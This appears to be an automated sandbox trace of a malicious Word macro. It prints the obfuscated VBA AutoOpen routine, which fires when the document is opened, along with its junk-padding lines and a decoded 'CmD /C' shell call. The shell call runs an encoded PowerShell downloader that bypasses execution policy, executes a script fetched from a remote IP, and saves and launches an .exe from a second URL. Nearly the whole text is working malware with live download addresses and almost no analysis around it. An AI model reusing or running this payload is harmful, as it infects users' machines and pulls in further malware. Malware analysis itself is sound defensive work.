            		Replace("P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand J[Bp[G4[cwB0[GE[bgBj[GU[I[[9[C[[WwBT[Hk[cwB0[GU[bQ[u[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CI[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[CI[KQ[7[[0[Cg[k[G0[ZQB0[Gg[bwBk[C[[PQ[g[Fs[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[F0[LgBH[GU[d[BN[GU[d[Bo[G8[Z[Bz[Cg[KQ[7[[0[CgBm[G8[cgBl[GE[YwBo[Cg[J[Bt[C[[aQBu[C[[J[Bt[GU[d[Bo[G8[Z[[p[Hs[DQ[K[[0[Cg[g[C[[aQBm[Cg[J[Bt[C4[TgBh[G0[ZQ[g[C0[ZQBx[C[[IgBE[G8[dwBu[Gw[bwBh[GQ[UwB0[HI[aQBu[Gc[Ig[p[Hs[DQ[K[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[MQ[3[DY[Lg[z[DI[Lg[z[DU[Lg[x[DY[Lw[3[D[[N[Bl[C4[c[Bo[H[[Ig[p[[0[Cg[g[C[[I[[g[C[[SQBF[Fg[K[[k[G0[LgBJ[G4[dgBv[Gs[ZQ[o[CQ[aQBu[HM[d[Bh[G4[YwBl[Cw[I[[o[CQ[dQBy[Gk[KQ[p[Ck[Ow[N[[o[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[[0[Cg[g[C[[fQ[N[[o[DQ[K[C[[I[Bp[GY[K[[k[G0[LgBO[GE[bQBl[C[[LQBl[HE[I[[i[EQ[bwB3[G4[b[Bv[GE[Z[BE[GE[d[Bh[CI[KQB7[[0[Cg[g[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[ZgBw[GU[d[By[GE[YQBy[GQ[ZQBs[Gw[YQ[u[GI[YQBu[GQ[LwB4[GE[c[Bf[DE[M[[y[GI[LQBB[Fo[MQ[v[Dc[M[[0[GU[LgBw[Gg[c[[/[Gw[PQBs[Gk[d[B0[GU[bg[0[C4[ZwBh[HM[Ig[p[[0[Cg[g[C[[I[[g[C[[J[By[GU[cwBw[G8[bgBz[GU[I[[9[C[[J[Bt[C4[SQBu[HY[bwBr[GU[K[[k[Gk[bgBz[HQ[YQBu[GM[ZQ[s[C[[K[[k[HU[cgBp[Ck[KQ[7[[0[Cg[N[[o[I[[g[C[[I[[g[CQ[c[Bh[HQ[a[[g[D0[I[Bb[FM[eQBz[HQ[ZQBt[C4[RQBu[HY[aQBy[G8[bgBt[GU[bgB0[F0[Og[6[Ec[ZQB0[EY[bwBs[GQ[ZQBy[F[[YQB0[Gg[K[[i[EM[bwBt[G0[bwBu[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bgBE[GE[d[Bh[CI[KQ[g[Cs[I[[i[Fw[X[BR[GQ[WgBH[F[[LgBl[Hg[ZQ[i[Ds[DQ[K[C[[I[[g[C[[I[Bb[FM[eQBz[HQ[ZQBt[C4[SQBP[C4[RgBp[Gw[ZQBd[Do[OgBX[HI[aQB0[GU[QQBs[Gw[QgB5[HQ[ZQBz[Cg[J[Bw[GE[d[Bo[Cw[I[[k[HI[ZQBz[H[[bwBu[HM[ZQ[p[Ds[DQ[K[[0[Cg[g[C[[I[[g[C[[J[Bj[Gw[cwBp[GQ[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[Ec[dQBp[GQ[I[[n[EM[M[[4[EE[RgBE[Dk[M[[t[EY[MgBB[DE[LQ[x[DE[R[[x[C0[O[[0[DU[NQ[t[D[[M[BB[D[[Qw[5[DE[Rg[z[Dg[O[[w[Cc[DQ[K[C[[I[[g[C[[I[[k[HQ[eQBw[GU[I[[9[C[[WwBU[Hk[c[Bl[F0[Og[6[Ec[ZQB0[FQ[eQBw[GU[RgBy[G8[bQBD[Ew[UwBJ[EQ[K[[k[GM[b[Bz[Gk[Z[[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[g[D0[I[Bb[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CQ[d[B5[H[[ZQ[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[u[EQ[bwBj[HU[bQBl[G4[d[[u[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bg[u[FM[a[Bl[Gw[b[BF[Hg[ZQBj[HU[d[Bl[Cg[J[Bw[GE[d[Bo[Cw[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[D[[KQ[N[[o[DQ[K[C[[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[C[[I[[g[C[[I[[N[[o[I[[g[H0[DQ[K[H0[DQ[K[[0[CgBF[Hg[aQB0[Ds[DQ[K[[0[Cg[=","[","A") -> P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=

            AlternativeText

            CInt

            ZcCmWkkqqB

            CBool

            Len

            		Len("\x14\x07") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            CxtsBzHdKBGmb

            GgRgBdCqvLXk

            CBool

            Len

            		Len(" \x03") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            ZxkaZVpVviNG

            kkfQTPTJpjjs

            CBool

            Len

            		Len(" \x01") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            bvfFxpHJWlX

            DbfBblNVjZrSd

            CBool

            Len

            		Len("\x14\x06") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            jfPdPngPqkfl

            PDvGhnzPcxhD

            CBool

            Len

            		Len(" \x01") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            JJLiShTtqxhXr

            mxpJbmSSQ

            CBool

            Len

            		Len("\x12 ") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            RkVtwCRbFKwknG

            MvZcVWwwaGt

            CBool

            Len

            		Len(" \x05") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            qNJnfcLpkQXcp

            mkaDKJfCfVRm

            CBool

            Len

            		Len("\x0b\x05") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            GvivfXcsHC

            StringsDecrypted Strings
            """"
            """"
            """"
            """"
            """"
            """"
            "h9mkae7"
            "CmD /C "
            LineInstructionMeta Information
            9

            Sub AutoOpen()

            10

            On Error Resume Next

            executed
            11

            DBvbDlfxWGXm = WifblkBfDS + CBool(2243) + Len(ChrW(5 + 9) + ChrW(3)) + LenB(Trim("QHSiqJpWNfHbmnlvPbbP")) + Len(lZlRjJlQKnBntw)

            WifblkBfDS

            CBool

            Len("\x0e\x03") -> 2

            ChrW

            LenB

            Trim

            lZlRjJlQKnBntw

            executed
            12

            lQbWzTrJtfhGiaS = pWNDRZbLZdGgl + CBool(5015) + Len(ChrW(1 + 1) + ChrW(2)) + LenB(Trim("XkBMzwHsSZswNPQMBDL")) + Len(SxZnBTiJkRBD)

            pWNDRZbLZdGgl

            CBool

            Len("\x02\x02") -> 2

            ChrW

            LenB

            Trim

            SxZnBTiJkRBD

            executed
            14

            tcZwqHFss = zTQlVkgJtJHVH + CBool(6903) + Len(ChrW(6 + 4) + ChrW(10)) + LenB(Trim("jDxtDndtrsCpNSNkxdJzhj")) + Len(RRdTnGKKsvm)

            zTQlVkgJtJHVH

            CBool

            Len(" ") -> 2

            ChrW

            LenB

            Trim

            RRdTnGKKsvm

            executed
            16

            qDRjdabdvLvw = bDhgcvpVdcXNV + CBool(6163) + Len(ChrW(2 + 7) + ChrW(10)) + LenB(Trim("TisXGlccaikddjLpXZhn")) + Len(hVXaKsWdqGRalHZ)

            bDhgcvpVdcXNV

            CBool

            Len(" ") -> 2

            ChrW

            LenB

            Trim

            hVXaKsWdqGRalHZ

            executed
            18

            TJgSBgQcFDq = xHtTibzqdL + CBool(6499) + Len(ChrW(2 + 7) + ChrW(1)) + LenB(Trim("iFvxjMCgcVJTWgGHG")) + Len(aQkXvbNzGWvh)

            xHtTibzqdL

            CBool

            Len(" \x01") -> 2

            ChrW

            LenB

            Trim

            aQkXvbNzGWvh

            executed
            19

            GWGjfdpJrxkg = PfFKPmwSmLwNT + CBool(2009) + Len(ChrW(4 + 7) + ChrW(6)) + LenB(Trim("kdHfDqVfHbpXcWBalpBj")) + Len(jwrLSVvTGmNgSNh)

            PfFKPmwSmLwNT

            CBool

            Len("\x0b\x06") -> 2

            ChrW

            LenB

            Trim

            jwrLSVvTGmNgSNh

            executed
            20

            CCvSPPJWbrLcHS = ""

            22

            fhjjZvgrrjq = mFGCJxVWBXjkl + CBool(1344) + Len(ChrW(8 + 10) + ChrW(3)) + LenB(Trim("bTZapLhFkwRKZPK")) + Len(SWsFlrFhBaHlgGg)

            mFGCJxVWBXjkl

            CBool

            Len("\x12\x03") -> 2

            ChrW

            LenB

            Trim

            SWsFlrFhBaHlgGg

            executed
            23

            rjvFRbqzLtkzn = "" + ""

            25

            GnxslaCGaT = qqmRcwgpqlk + CBool(6041) + Len(ChrW(1 + 2) + ChrW(7)) + LenB(Trim("FvacXVVTqjKJxgdZjv")) + Len(QdRJwGnCHinZ)

            qqmRcwgpqlk

            CBool

            Len("\x03\x07") -> 2

            ChrW

            LenB

            Trim

            QdRJwGnCHinZ

            executed
            26

            xDgzRpPhghWrJL = NfHHmGCha + CBool(347) + Len(ChrW(3 + 10) + ChrW(10)) + LenB(Trim("QRgSjBfjthjpDkPxVpmDlb")) + Len(jWwMxvjadBtl)

            NfHHmGCha

            CBool

            Len(" ") -> 2

            ChrW

            LenB

            Trim

            jWwMxvjadBtl

            executed
            29

            tTRXtXmcgPrktFh = jdmzHVMkcVXcdMP + CBool(5783) + Len(ChrW(2 + 10) + ChrW(10)) + LenB(Trim("rnkhGPWpTBpGNcVlk")) + Len(irVHvSQQvHtd)

            jdmzHVMkcVXcdMP

            CBool

            Len("\x0c ") -> 2

            ChrW

            LenB

            Trim

            irVHvSQQvHtd

            executed
            32

            GhFdPWgpiqRj = CNLqTtpWDztqK + CBool(8793) + Len(ChrW(1 + 8) + ChrW(9)) + LenB(Trim("SXNhbQpQzmwVQlTmR")) + Len(RJaDmljLvpgjz)

            CNLqTtpWDztqK

            CBool

            Len(" ") -> 2

            ChrW

            LenB

            Trim

            RJaDmljLvpgjz

            executed
            36

            LbZlvNQVaFtMi = vxPLFqFShhCqh + CBool(6141) + Len(ChrW(6 + 10) + ChrW(3)) + LenB(Trim("HahDZGNRJvHTcDKWPnnl")) + Len(zzfDDCMbPXrM)

            vxPLFqFShhCqh

            CBool

            Len("\x10\x03") -> 2

            ChrW

            LenB

            Trim

            zzfDDCMbPXrM

            executed
            38

            SKKdjMpgJRQRK = "" + "" + Trim("")

            Trim

            40

            ppBLnCMSjnSV = fPSQKCwZHRJ + CBool(6767) + Len(ChrW(6 + 9) + ChrW(3)) + LenB(Trim("cwZGhscSkqdkCDrjXnTS")) + Len(dmfMtsadBraSX)

            fPSQKCwZHRJ

            CBool

            Len("\x0f\x03") -> 2

            ChrW

            LenB

            Trim

            dmfMtsadBraSX

            executed
            43

            pzSpxTNqbhCwW = DVsGkQJsLPQCcZqt + CBool(1865) + Len(ChrW(2 + 8) + ChrW(6)) + LenB(Trim("kZNsfRinpsRKqfNnF")) + Len(laLlSgkFRvtad)

            DVsGkQJsLPQCcZqt

            CBool

            Len(" \x06") -> 2

            ChrW

            LenB

            Trim

            laLlSgkFRvtad

            executed
            44

            JtnpWHTxSiiz = aCwfgTJDmbRQW + CBool(6925) + Len(ChrW(9 + 10) + ChrW(2)) + LenB(Trim("dDWBignPNFqBkrjqZlKiT")) + Len(chdsMqJKtKM)

            aCwfgTJDmbRQW

            CBool

            Len("\x13\x02") -> 2

            ChrW

            LenB

            Trim

            chdsMqJKtKM

            executed
            46

            QmrcNWGaSgCWz = lFQtNLhczCraQG + CBool(3980) + Len(ChrW(3 + 8) + ChrW(6)) + LenB(Trim("VKvjZliFSGsfCGKhSf")) + Len(KPgHQGtPqLTjphCn)

            lFQtNLhczCraQG

            CBool

            Len("\x0b\x06") -> 2

            ChrW

            LenB

            Trim

            KPgHQGtPqLTjphCn

            executed
            47

            hdNxDVBxCTqQTpB = LTrim("")

            LTrim

            48

            nFtNXRVXbdFr = VPWjviWKBpJi + CBool(7052) + Len(ChrW(4 + 5) + ChrW(8)) + LenB(Trim("VBjjdfMslCcHNgbjJa")) + Len(nBDKwlZJvRMwRR)

            VPWjviWKBpJi

            CBool

            Len(" \x08") -> 2

            ChrW

            LenB

            Trim

            nBDKwlZJvRMwRR

            executed
            50

            gLkHkMNJpWGPiM = qcmPmHlmdWZqj + CBool(194) + Len(ChrW(7 + 5) + ChrW(1)) + LenB(Trim("ZTTXLrVxkWNKjjPrfCj")) + Len(crtmLCNraQLF)

            qcmPmHlmdWZqj

            CBool

            Len("\x0c\x01") -> 2

            ChrW

            LenB

            Trim

            crtmLCNraQLF

            executed
            51

            zMzTwHmjJjndL = rDZKxGvDrNBJ + CBool(3433) + Len(ChrW(7 + 9) + ChrW(1)) + LenB(Trim("XaMLmrHxaSlqSXV")) + Len(ptlCjjDiKZ)

            rDZKxGvDrNBJ

            CBool

            Len("\x10\x01") -> 2

            ChrW

            LenB

            Trim

            ptlCjjDiKZ

            executed
            53

            MNKsCVNXktg = hdJScJQgXmkm + CBool(2807) + Len(ChrW(7 + 5) + ChrW(9)) + LenB(Trim("RbRanmjXmLslKkZDlB")) + Len(WfkDLfGhqhWfhTN)

            hdJScJQgXmkm

            CBool

            Len("\x0c ") -> 2

            ChrW

            LenB

            Trim

            WfkDLfGhqhWfhTN

            executed
            54

            nHMgbFSzmgv = TBWHlimLMV + CBool(7832) + Len(ChrW(9 + 8) + ChrW(10)) + LenB(Trim("LsHkNQtMsMzltJgPQgfkR")) + Len(JHxRSZaqkRwtHi)

            TBWHlimLMV

            CBool

            Len("\x11 ") -> 2

            ChrW

            LenB

            Trim

            JHxRSZaqkRwtHi

            executed
            55

            RJzJQGRzrc = ""

            58

            MCFxxPbQXmfGfnL = NsLSSSLGDfkwlt + CBool(5937) + Len(ChrW(6 + 9) + ChrW(3)) + LenB(Trim("SNpRVqvVcnPhX")) + Len(gJMqliiHCRNZQTc)

            NsLSSSLGDfkwlt

            CBool

            Len("\x0f\x03") -> 2

            ChrW

            LenB

            Trim

            gJMqliiHCRNZQTc

            executed
            59

            LdnJwgZjbnKqtaa = aBBZDWsTDPPnS + CBool(8258) + Len(ChrW(7 + 3) + ChrW(4)) + LenB(Trim("faLQCswVKLgWjmJKg")) + Len(KmpHBhFRwlKKMm)

            aBBZDWsTDPPnS

            CBool

            Len(" \x04") -> 2

            ChrW

            LenB

            Trim

            KmpHBhFRwlKKMm

            executed
            61

            FHvwQsqqdgbr = wtDvZMrVDatsPG + CBool(8557) + Len(ChrW(6 + 1) + ChrW(4)) + LenB(Trim("lDjJcSLdkCqGrRzwdlKHLVHn")) + Len(qlkRQRpBTtrm)

            wtDvZMrVDatsPG

            CBool

            Len("\x07\x04") -> 2

            ChrW

            LenB

            Trim

            qlkRQRpBTtrm

            executed
            62

            CiRSdXZHwV = NKxZvdzbPWxxN + CBool(1618) + Len(ChrW(10 + 4) + ChrW(4)) + LenB(Trim("pJRTVfBcDhxrcwKkPDbFt")) + Len(wKPlSJwvvXqW)

            NKxZvdzbPWxxN

            CBool

            Len("\x0e\x04") -> 2

            ChrW

            LenB

            Trim

            wKPlSJwvvXqW

            executed
            65

            xVpspwsllZGqG = MpTBwVxXgdanm + CBool(5472) + Len(ChrW(1 + 3) + ChrW(5)) + LenB(Trim("KlilNHcTHfLXgQgkkRH")) + Len(tlWSglqmcgHrcq)

            MpTBwVxXgdanm

            CBool

            Len("\x04\x05") -> 2

            ChrW

            LenB

            Trim

            tlWSglqmcgHrcq

            executed
            67

            CWflqnrJbKVBj = RTrim("") + ""

            RTrim

            68

            kkCTbdBcJnsGw = sFdLzbirFimt + CBool(6092) + Len(ChrW(6 + 7) + ChrW(8)) + LenB(Trim("cvXVCvgQfdqkdZkQwadmPMg")) + Len(acSnFqKQZJkgq)

            sFdLzbirFimt

            CBool

            Len(" \x08") -> 2

            ChrW

            LenB

            Trim

            acSnFqKQZJkgq

            executed
            70

            cGvRqkvVFLFzsK = mChrRcSmQTlzbtd + CBool(476) + Len(ChrW(5 + 5) + ChrW(9)) + LenB(Trim("iXZiMssZcgzrHZrcFvVtk")) + Len(iixsSRWTqT)

            mChrRcSmQTlzbtd

            CBool

            Len(" ") -> 2

            ChrW

            LenB

            Trim

            iixsSRWTqT

            executed
            74

            QwXhZsRSjsaLm = FracTilLgHn + CBool(590) + Len(ChrW(4 + 8) + ChrW(7)) + LenB(Trim("MNhhbMhpCpvcwlCCWRgfhFc")) + Len(igrKGJjKXXfr)

            FracTilLgHn

            CBool

            Len("\x0c\x07") -> 2

            ChrW

            LenB

            Trim

            igrKGJjKXXfr

            executed
            76

            Set pNHbvwXpnbZvS = Shapes(Trim("h9mkae7"))

            Shapes

            Trim

            77

            dWDHaNGFDcG = iGKRcdzDwMZzqlWN + CBool(2417) + Len(ChrW(5 + 3) + ChrW(4)) + LenB(Trim("hDNlqMjmcDXrwkrDwq")) + Len(mQhXDqaHVLMab)

            iGKRcdzDwMZzqlWN

            CBool

            Len("\x08\x04") -> 2

            ChrW

            LenB

            Trim

            mQhXDqaHVLMab

            executed
            78

            zVRvpZVSlZP = jxrRCZTpPSjqG + CBool(747) + Len(ChrW(9 + 2) + ChrW(3)) + LenB(Trim("wnkLGNvnwtBPGKxVMs")) + Len(HmbfaFbBPKWJstpW)

            jxrRCZTpPSjqG

            CBool

            Len("\x0b\x03") -> 2

            ChrW

            LenB

            Trim

            HmbfaFbBPKWJstpW

            executed
            80

            VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + - 702)

            Shell#

            Trim

            Replace("P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand J[Bp[G4[cwB0[GE[bgBj[GU[I[[9[C[[WwBT[Hk[cwB0[GU[bQ[u[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CI[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[CI[KQ[7[[0[Cg[k[G0[ZQB0[Gg[bwBk[C[[PQ[g[Fs[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[F0[LgBH[GU[d[BN[GU[d[Bo[G8[Z[Bz[Cg[KQ[7[[0[CgBm[G8[cgBl[GE[YwBo[Cg[J[Bt[C[[aQBu[C[[J[Bt[GU[d[Bo[G8[Z[[p[Hs[DQ[K[[0[Cg[g[C[[aQBm[Cg[J[Bt[C4[TgBh[G0[ZQ[g[C0[ZQBx[C[[IgBE[G8[dwBu[Gw[bwBh[GQ[UwB0[HI[aQBu[Gc[Ig[p[Hs[DQ[K[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[MQ[3[DY[Lg[z[DI[Lg[z[DU[Lg[x[DY[Lw[3[D[[N[Bl[C4[c[Bo[H[[Ig[p[[0[Cg[g[C[[I[[g[C[[SQBF[Fg[K[[k[G0[LgBJ[G4[dgBv[Gs[ZQ[o[CQ[aQBu[HM[d[Bh[G4[YwBl[Cw[I[[o[CQ[dQBy[Gk[KQ[p[Ck[Ow[N[[o[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[[0[Cg[g[C[[fQ[N[[o[DQ[K[C[[I[Bp[GY[K[[k[G0[LgBO[GE[bQBl[C[[LQBl[HE[I[[i[EQ[bwB3[G4[b[Bv[GE[Z[BE[GE[d[Bh[CI[KQB7[[0[Cg[g[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[ZgBw[GU[d[By[GE[YQBy[GQ[ZQBs[Gw[YQ[u[GI[YQBu[GQ[LwB4[GE[c[Bf[DE[M[[y[GI[LQBB[Fo[MQ[v[Dc[M[[0[GU[LgBw[Gg[c[[/[Gw[PQBs[Gk[d[B0[GU[bg[0[C4[ZwBh[HM[Ig[p[[0[Cg[g[C[[I[[g[C[[J[By[GU[cwBw[G8[bgBz[GU[I[[9[C[[J[Bt[C4[SQBu[HY[bwBr[GU[K[[k[Gk[bgBz[HQ[YQBu[GM[ZQ[s[C[[K[[k[HU[cgBp[Ck[KQ[7[[0[Cg[N[[o[I[[g[C[[I[[g[CQ[c[Bh[HQ[a[[g[D0[I[Bb[FM[eQBz[HQ[ZQBt[C4[RQBu[HY[aQBy[G8[bgBt[GU[bgB0[F0[Og[6[Ec[ZQB0[EY[bwBs[GQ[ZQBy[F[[YQB0[Gg[K[[i[EM[bwBt[G0[bwBu[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bgBE[GE[d[Bh[CI[KQ[g[Cs[I[[i[Fw[X[BR[GQ[WgBH[F[[LgBl[Hg[ZQ[i[Ds[DQ[K[C[[I[[g[C[[I[Bb[FM[eQBz[HQ[ZQBt[C4[SQBP[C4[RgBp[Gw[ZQBd[Do[OgBX[HI[aQB0[GU[QQBs[Gw[QgB5[HQ[ZQBz[Cg[J[Bw[GE[d[Bo[Cw[I[[k[HI[ZQBz[H[[bwBu[HM[ZQ[p[Ds[DQ[K[[0[Cg[g[C[[I[[g[C[[J[Bj[Gw[cwBp[GQ[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[Ec[dQBp[GQ[I[[n[EM[M[[4[EE[RgBE[Dk[M[[t[EY[MgBB[DE[LQ[x[DE[R[[x[C0[O[[0[DU[NQ[t[D[[M[BB[D[[Qw[5[DE[Rg[z[Dg[O[[w[Cc[DQ[K[C[[I[[g[C[[I[[k[HQ[eQBw[GU[I[[9[C[[WwBU[Hk[c[Bl[F0[Og[6[Ec[ZQB0[FQ[eQBw[GU[RgBy[G8[bQBD[Ew[UwBJ[EQ[K[[k[GM[b[Bz[Gk[Z[[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[g[D0[I[Bb[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CQ[d[B5[H[[ZQ[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[u[EQ[bwBj[HU[bQBl[G4[d[[u[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bg[u[FM[a[Bl[Gw[b[BF[Hg[ZQBj[HU[d[Bl[Cg[J[Bw[GE[d[Bo[Cw[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[D[[KQ[N[[o[DQ[K[C[[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[C[[I[[g[C[[I[[N[[o[I[[g[H0[DQ[K[H0[DQ[K[[0[CgBF[Hg[aQB0[Ds[DQ[K[[0[Cg[=","[","A") -> P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand 